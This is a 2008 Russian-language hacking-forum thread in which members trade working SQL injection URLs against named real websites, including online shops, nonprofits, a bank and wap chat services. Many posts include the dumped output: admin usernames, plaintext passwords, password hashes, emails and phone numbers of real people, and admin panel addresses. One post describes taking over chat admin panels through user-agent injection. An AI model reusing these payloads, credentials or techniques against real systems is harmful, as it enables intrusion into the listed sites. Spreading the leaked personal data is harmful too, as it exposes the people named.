Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
01.09.2008, 06:30
|
|
Новичок
Регистрация: 07.08.2008
Сообщений: 8
Провел на форуме:
33013
Репутация:
3
|
|
Перебераем до таблицы
http://www.guyetteandschmidt.com/warehouse/shopdisplayproducts.asp?cat=1'%20union%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45%20from%20tbluser"having% 201=%201--sp_passsword
Теперь смотри пишет в 4 таблице логин в 22 пароль.
http://www.guyetteandschmidt.com/warehouse/shopdisplayproducts.asp?cat=1'%20union%20select%20 1,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20fro m%20tbluser"having%201=%201--sp_password
|
|
|
01.09.2008, 23:52
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065
Репутация:
869
|
|
Код:
http://www.cz-usa.com/product_detail.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6%20LIMIT%201,1/*
4.0.21-standard:czusa:czusa@lsh
Код:
http://www.bluestars.org/story.php?story_id=-1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6/*
Код:
http://www.fruehstyxradio.de/shop.php?artikel=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10%20LIMIT%201,1/*
4.0.24_Debian-10sarge2-log:usr_web1_1:web1@localhost
|
|
|
|
02.09.2008, 01:46
|
|
Banned
Регистрация: 31.08.2008
Сообщений: 2
Провел на форуме:
17673
Репутация:
-57
|
|
Все нашел сам! Не повторяються!
http://www.freepoc.de/viewapp.php?id=-12+union+select+1,2,3,4,5,6,7,version()/*
---------------------------------------------------------------------------------------------
http://www.generalsemantics.org/inner.php?page=news&id=-9+union+select+1,2,3,concat_ws(0x3a,UserName,Login Name,PassWord,email,phoneNo)+from+tbl_adminusers--
Lance Strate:lstrate:heroes:lstrate@time-binding.org:201-921-4745
Marty Levinson:Marty:Fairytales:igs@timebinding.org:718-793-6621
nmtucson:nmtucson:justme:millerstwo@comcast.net:52 0-225-0476
Jennifer Clarke:jennifer:56375637:igs@time-binding.org:817-922-9950
Админка http://www.generalsemantics.org/admin/login.php
--------------------------------------------------------------------
http://www.korova.ru/humor/viewer.php?id=-32+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18--
4.0.27-max-log
---------------------------------------------------------------------
http://www.arcadepod.com/games/details.php?id=-3937+union+select+1,2,3,4,5,version(),7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
4.1.20
PR=5
---------------------------------------------------------------------
http://www.teatrdoc.ru/plays.php?id=-5+union+select+1,2,version(,4,5--
4.1.22
http://www.sumw.com/index.php?page=products&pid=-1+UNION+SELECT+1,2,3,4,5,version(),7,8--
http://zvezda.ru/file.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,version(,11--
http://www.teatrdoc.ru/plays.php?id=-5+union+select+1,2,version(),4,5--
------------------------------
http://www.dubkow-muehle.de/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user() ,0x3a,database())--
version() - 5.0.45
------------------------------
http://www.asud.net/Iniziative/iniziativa.php?in=1+UNION+SELECT+1,concat_ws(0x3a, version(),database(),user()),3,4,5,6,7,8--
4.1.22-standard-log
------------------------------
http://www.cenn.org/index.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,version(),17,18,19,20,21,22,23--
4.1.14
---------------------
http://www.lcoastpress.com/book.php?id=-99+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20--
4.1.22
lcpadmin : plQAxyWbMGJyQ Таблица user
---------------------
http://www.icehw.net/article.php?id=-99+union+select+1,2,3,4,5,6,7,8,version(),10,11,12 ,13,14,15,16--
5.0.22-Debian_0ubuntu6.06.3-log
table: login
Concat_ws(0x3a,ID,username,PASSWORD)
---------------------
http://www.ecuadorminingnews.com/news.php?id=-99+union+select+1,2--
--------------------------------------
http://www.rezina.biz/show.php?id=-27+union+select+1,2,version(),4,5,6,7--
4.0.27-max-log
---------------------------------------
http://www.eatmybrains.com/showfeature.php?id=-27+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14,15,16--
5.0.51a-community
Таблица user но в ней нет колнки с пасами!
----------------------------------------
http://www.satire.ru/actor_detail.php?id=-31+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13--
4.1.22
-----------------
http://www.zaistinu.ru/articles/?sid=-29+union+select+version()--
5.0.32-Debian_7etch6-log
-----------------
http://www.iped.com/cm.php?id=-38'+union+select+1,concat_ws(0x3a,username,passwor d),3,4,5+from+iped.user+limit+1,1--
-----------------
MTV
http://www.mtvphil.com/news.php?id=-17+union+select+1,2,version(),4,5,6,7,8,9,10,11--
4.1.22-standard
-----------------
http://www.whitestrip.ru/article.php?id=-49+union+select+1,2,3,4,5,table_name,7,8,9,10,11,1 2,13,14,15+from+information_schema.tables+limit+1, 1--
-----------------
http://okwildlife.org/news.php?id=-48+union+select+1,2,3,version(),5,6--
4.1.21-community-nt
-----------------
http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat(username,0x3a3a,pass)+from+u sers+limit+2,1--
login:brianficek
pass:85688717ef4fab9
-----------------
http://vli-info.ru/index.php?p=show_cont&parent_id=-1+union+select+1,2,3,concat(login,0x3a3a,password, 0x3a3a,admin),5,6,7+from+users+limit+0,1--
admin::5416d7cd6ef195a0f7622a9c56b55e84
-----------------
http://www.info.gomel.by/news.php?id=-12+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),DATABASE()),6,7,8,9,10,11,12--
4.0.18:artbase
-----------------
http://www.kidtokid.com/news.php?id=-13+union+select+1,2,3,4,5,6,7,8,9--
-----------------
http://www.idcfl.com/news.php?id=-2+union+select+1,table_name,3+from+information_sch ema.tables+limit+1,1--
-----------------
http://www.videodep.com/news.php?id=-23+union+select+1,concat_ws(0x3a,id,username,passw ord),3,4+from+users+limit+0,1--
http://www.videodep.com/news.php?id=-23+union+select+1,concat_ws(0x3a,username,password ,id),3,4+from+admin--
http://www.videodep.com/users/
http://www.videodep.com/admin/ drew:test
------------------
Выбирал себе котлы, и случайно увидел id=7 Вот что из этого получилось, но нет табл с пассами, так бы может нахаляву заказал бы)))
http://www.clockmarket.ru/catalog/index.php?brand_id=-7+union+select+1,table_name,3+from+information_sch ema.tables+limit+0,1--
-------------------
Последний раз редактировалось AND1; 02.09.2008 в 19:18..
|
|
|
|
02.09.2008, 09:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Сайт какого то китайского ресторана (могу ошибаться! =))
http://www.orange-group.net/news.php?news_id=-1+union+select+user(),2,version()/*
И на сладенькое:
http://www.aversi.ge/news.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,user(),17,18,19,20,21,22,23/*
|
|
|
|
02.09.2008, 17:47
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
Первое сообщение первый взлом.
В общем пароли в неприкрытом виде да вообще все неприкрыто.
Сайт: http://northlove.ru
Код:
http://northlove.ru/stati.php?p=2&r=1'+UNION+SELECT+1,password,name,4, 5,6,id,8+ from+users/*
Mysql version 5.0.45
database love
user root@localhost
Буду рад за какие нить подсказки....*) |
|
|
|
03.09.2008, 02:42
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
Провел на форуме:
347573
Репутация:
185
|
|
Промсвязьбанк
target:
http://www.psbank.ru
SQL:
http://www.psbank.ru/news/bank/-9722'+union+select+1,2,3,4,5,6,'sql/*.html
http://www.psbank.ru/person/-46'+union+select+1,2,'/*/
раскрытие пути:
/home/www/webadmin/inc/pfunc.php
SELECT * FROM PSBNEWS WHERE "id" = '*'
SELECT "dir" , "title" as "title" , "id" , "pid" , "hiddenLink" , "cod" FROM CATALOGUE_FIN WHERE "dir" = 'news' or "dir" = 'bank' or "dir" = '-9722' + union + select + 1 , 2 , 3 , 4 , 5 + where + "id" != '1' ORDER BY "pid"
Это все что удалось наковырять. Если у кого что получится больше, отпишитесь плз
Последний раз редактировалось -=Static=-; 03.09.2008 в 02:45..
|
|
|
|
03.09.2008, 10:49
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Продолжаю Wap тематику!
(Цель заполучить админку)
Первый сервис wap-чатов
100 чатов==100 админов (;
wolk-club.ru
Второй чат (того же движка)
mmfki.ru
Третий чат (того же движка)
wap.srb.co.yu
Четвертый чат (того же движка)
neochat.co.za
Пятый чат (того же движка)
chat.blaser.h2m.ru
Принцип инъекции - подмена юзер агента на Для подмены я использую Ad Muncher (скачать можно Тут )
Иногда приходится зайти в редактирование профиля, чтобы юзер агент обновился!
P.S. Тут видео по взломам этого типа движков. (Писалось мной в прошлом году под утерянным ником)
P.P.S. Адрес админки admin.php?id=Ваш id&pass=Ваш pass
P.P.P.S По поводу того, что сплойт не сработал - пробуйте менять юзер агент при регистрации и при смене профиля! При регистрации на некоторых модификациях движка может выдавать ошибку или бан по IP+Browser! Так же в некоторых движках не фильтруется поле "О себе"
Последний раз редактировалось Twoster; 03.09.2008 в 13:28..
|
|
|
|
04.09.2008, 12:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Вот еще чуток скулей:
http://www.vaal.ru/show.php?id=-1+union+select+1,database(),3,4,5,6,7,8,user(),ver sion(),11/*
http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,user(),version(),database(),6,7 ,8,9,10,11,12,13/*
http://www.rezina.biz/show.php?id=-1+union+select+1,2,user(),4,database(),6,7/*
http://www.sufficiencyeconomy.org/show.php?Id=-134+union+select+1,2,3,4,5,user(),7,database(),9,1 0,11,12,13,14,15/*
P.S. не забываем убирать пробелы! (; |
|
|
|
04.09.2008, 12:16
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
http://www.pmed.ru/conf/index.php?id=-2376111+union+select+1,2,3,4,5,6,7,8,9,10,11--
странного вида инъекция -)
|
|
|
|
04.09.2008, 12:21
|
|
Участник форума
Регистрация: 14.07.2007
Сообщений: 108
Провел на форуме:
1888785
Репутация:
305
|
|
Мой рекорд по количеству столбцов. Ппц, не думал, что такое встречается...
http://www.net-antiquites.com/index.php?page=produits&id_typeproduit=119&id=-273+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,user(),21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,version(),36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,6 1,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77, 78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94 ,95,96,97,98,99,100,101,102,103,104,105,106,107,10 8,109,110,111,112,113,114,115,116,117,118,119,120, 121,122,123,124,125,126,127--
netan_netan@localhost
5.0.51a-community-log |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
